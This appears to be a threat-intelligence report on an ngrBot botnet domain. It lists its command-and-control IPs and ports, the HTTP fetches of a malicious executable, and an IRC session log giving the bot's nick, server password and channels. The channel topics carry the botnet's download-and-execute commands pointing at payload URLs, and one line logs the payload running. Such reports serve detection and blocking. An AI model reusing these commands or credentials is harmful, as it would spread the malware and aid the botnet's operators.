jer0001.in (ngrBot hosted in United States, Razor Inc)

Very big botnet; different domain names from this net have already been posted here.

Resolved : [jer0001.in] To [208.83.233.194] port 1889
Resolved : [jer0001.in] To [208.83.232.90] port 1889
Resolved : [jer0001.in] To [208.83.234.66] port 1889

HTTP Conversations:

199.15.234.7:80 – [api.wipmania.com]
Request: GET /
Response: 200 “OK”
199.7.177.218:80 – [hotfile.com]
Request: GET /dl/146860590/6c4cc0b/sgfdfa.exe
Response: 302 “Found”
74.120.11.30:80 – [s396.hotfile.com]
Request: GET /get/ea193a98752b0a12f9b89946846523faaeeb1858/4f3ec299/2/e9a6e3acb547b912/8c0ea2e/sgfdfa.exe
Response: 200 “OK”

IRC Conversations:

208.83.234.66:1889
108.59.1.230:1889
46.165.192.30:1889
85.17.219.217:1889
95.211.40.20:1889

Nick: n{US|XPa}evbnaif
Username: evbnaif
Server Pass: mflrod
Joined Channel:
Joined Channel: #zxcv with Password mflrod
Joined Channel: #US
Channel Topic for Channel : “~dw http://hotfile.com/dl/146860590/6c4cc0b/sgfdfa.exe 70bfef10e0c8d792ec5b0a4067901133”
Channel Topic for Channel #zxcv: “~pu http://hotfile.com/dl/146860597/0a721e9/17feb.exe ca04a7cebffaa9f90511b388be3dd839 ~s -o ~s”
Private Message to Channel : “[d=”http://hotfile.com/dl/146860590/6c4cc0b/sgfdfa.exe” s=”86016 bytes”] Executed file “C:\Documents and Settings\Administrator\Application Data\1.exe” – Download retries: 0”


Hosting info:
http://whois.domaintools.com/208.83.234.66
